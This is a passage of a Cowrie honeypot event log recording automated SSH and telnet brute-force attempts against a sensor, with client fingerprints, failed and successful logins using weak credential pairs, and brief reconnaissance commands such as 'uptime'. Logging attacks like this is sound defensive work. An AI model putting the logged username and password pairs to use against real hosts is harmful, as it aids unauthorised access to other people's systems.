sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:47:29.884470Z","src_ip":"212.227.125.160","session":"ae82990052fe"}
{"eventid":"cowrie.login.failed","username":"docker","password":"letmein","message":"login attempt [docker/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T01:47:31.436399Z","src_ip":"212.227.125.160","session":"ae82990052fe"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:47:32.876411Z","src_ip":"212.227.125.160","session":"ae82990052fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37280,"dst_ip":"1.2.3.4","dst_port":23,"session":"687f5c8bec90","protocol":"telnet","message":"New connection: 212.227.235.229:37280 (1.2.3.4:23) [session: 687f5c8bec90]","sensor":"my-vps","timestamp":"2025-08-31T01:47:41.972289Z"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":57632,"dst_ip":"1.2.3.4","dst_port":22,"session":"080e01315b5e","protocol":"ssh","message":"New connection: 82.67.125.95:57632 (1.2.3.4:22) [session: 080e01315b5e]","sensor":"my-vps","timestamp":"2025-08-31T01:47:47.944176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:47:47.945005Z","src_ip":"82.67.125.95","session":"080e01315b5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:47:47.975826Z","src_ip":"82.67.125.95","session":"080e01315b5e"}
{"eventid":"cowrie.login.failed","username":"myuser","password":"12345678","message":"login attempt [myuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:47:48.143037Z","src_ip":"82.67.125.95","session":"080e01315b5e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:47:49.175464Z","src_ip":"82.67.125.95","session":"080e01315b5e"}
{"eventid":"cowrie.session.closed","duration":12.474817514419556,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:47:54.447037Z","src_ip":"212.227.235.229","session":"687f5c8bec90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34924,"dst_ip":"1.2.3.4","dst_port":22,"session":"86e12af861e0","protocol":"ssh","message":"New connection: 212.227.235.229:34924 (1.2.3.4:22) [session: 86e12af861e0]","sensor":"my-vps","timestamp":"2025-08-31T01:48:09.202076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:48:10.145636Z","src_ip":"212.227.235.229","session":"86e12af861e0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:48:10.146368Z","src_ip":"212.227.235.229","session":"86e12af861e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53096,"dst_ip":"1.2.3.4","dst_port":22,"session":"15acba71019d","protocol":"ssh","message":"New connection: 212.227.125.160:53096 (1.2.3.4:22) [session: 15acba71019d]","sensor":"my-vps","timestamp":"2025-08-31T01:48:10.440149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:48:11.909007Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:48:11.910443Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.login.success","username":"root","password":"Dxdiag12","message":"login attempt [root/Dxdiag12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:48:18.440646Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.login.failed","username":"docker","password":"welcome","message":"login attempt [docker/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:48:20.892695Z","src_ip":"212.227.235.229","session":"86e12af861e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:48:21.840622Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T01:48:21.841421Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.session.closed","duration":"13.6","message":"Connection lost after 13.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:22.832271Z","src_ip":"212.227.235.229","session":"86e12af861e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:23.171130Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:23.172184Z","src_ip":"212.227.125.160","session":"15acba71019d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60974,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cfaff85e9f6","protocol":"ssh","message":"New connection: 217.72.205.35:60974 (1.2.3.4:22) [session: 8cfaff85e9f6]","sensor":"my-vps","timestamp":"2025-08-31T01:48:26.871082Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:26.872233Z","src_ip":"217.72.205.35","session":"8cfaff85e9f6"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":55316,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2b4726a65be","protocol":"ssh","message":"New connection: 201.148.180.50:55316 (1.2.3.4:22) [session: f2b4726a65be]","sensor":"my-vps","timestamp":"2025-08-31T01:48:29.242565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:48:30.318628Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:48:30.319731Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54168,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8d66c1fef95","protocol":"ssh","message":"New connection: 212.227.125.160:54168 (1.2.3.4:22) [session: b8d66c1fef95]","sensor":"my-vps","timestamp":"2025-08-31T01:48:31.398283Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:48:31.896588Z","src_ip":"212.227.125.160","session":"b8d66c1fef95"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:48:31.897548Z","src_ip":"212.227.125.160","session":"b8d66c1fef95"}
{"eventid":"cowrie.login.failed","username":"docker","password":"welcome","message":"login attempt [docker/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T01:48:34.446140Z","src_ip":"212.227.125.160","session":"b8d66c1fef95"}
{"eventid":"cowrie.login.success","username":"root","password":"Dxdiag12","message":"login attempt [root/Dxdiag12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:48:34.565686Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:35.907137Z","src_ip":"212.227.125.160","session":"b8d66c1fef95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:48:36.616101Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T01:48:36.616861Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:37.805335Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:37.806481Z","src_ip":"201.148.180.50","session":"f2b4726a65be"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":33550,"dst_ip":"1.2.3.4","dst_port":22,"session":"98ebc213b9ec","protocol":"ssh","message":"New connection: 82.67.125.95:33550 (1.2.3.4:22) [session: 98ebc213b9ec]","sensor":"my-vps","timestamp":"2025-08-31T01:48:43.198375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:48:43.199246Z","src_ip":"82.67.125.95","session":"98ebc213b9ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:48:43.229829Z","src_ip":"82.67.125.95","session":"98ebc213b9ec"}
{"eventid":"cowrie.login.failed","username":"printer","password":"printer","message":"login attempt [printer/printer] failed","sensor":"my-vps","timestamp":"2025-08-31T01:48:43.393839Z","src_ip":"82.67.125.95","session":"98ebc213b9ec"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:48:44.427202Z","src_ip":"82.67.125.95","session":"98ebc213b9ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45660,"dst_ip":"1.2.3.4","dst_port":22,"session":"f13f09dbfc81","protocol":"ssh","message":"New connection: 212.227.235.229:45660 (1.2.3.4:22) [session: f13f09dbfc81]","sensor":"my-vps","timestamp":"2025-08-31T01:49:11.778936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:49:12.163366Z","src_ip":"212.227.235.229","session":"f13f09dbfc81"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:49:12.164123Z","src_ip":"212.227.235.229","session":"f13f09dbfc81"}
{"eventid":"cowrie.login.failed","username":"docker","password":"abc123","message":"login attempt [docker/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:49:17.863279Z","src_ip":"212.227.235.229","session":"f13f09dbfc81"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:49:19.656074Z","src_ip":"212.227.235.229","session":"f13f09dbfc81"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45222,"dst_ip":"1.2.3.4","dst_port":23,"session":"829c0050fd0a","protocol":"telnet","message":"New connection: 212.227.235.229:45222 (1.2.3.4:23) [session: 829c0050fd0a]","sensor":"my-vps","timestamp":"2025-08-31T01:49:31.009259Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35738,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0277591102a","protocol":"ssh","message":"New connection: 212.227.125.160:35738 (1.2.3.4:22) [session: e0277591102a]","sensor":"my-vps","timestamp":"2025-08-31T01:49:33.333975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:49:33.866097Z","src_ip":"212.227.125.160","session":"e0277591102a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:49:33.866874Z","src_ip":"212.227.125.160","session":"e0277591102a"}
{"eventid":"cowrie.login.failed","username":"docker","password":"abc123","message":"login attempt [docker/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:49:36.121809Z","src_ip":"212.227.125.160","session":"e0277591102a"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:49:37.714400Z","src_ip":"212.227.125.160","session":"e0277591102a"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":57728,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7e5625e00b","protocol":"ssh","message":"New connection: 82.67.125.95:57728 (1.2.3.4:22) [session: da7e5625e00b]","sensor":"my-vps","timestamp":"2025-08-31T01:49:39.115442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:49:39.116350Z","src_ip":"82.67.125.95","session":"da7e5625e00b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@opens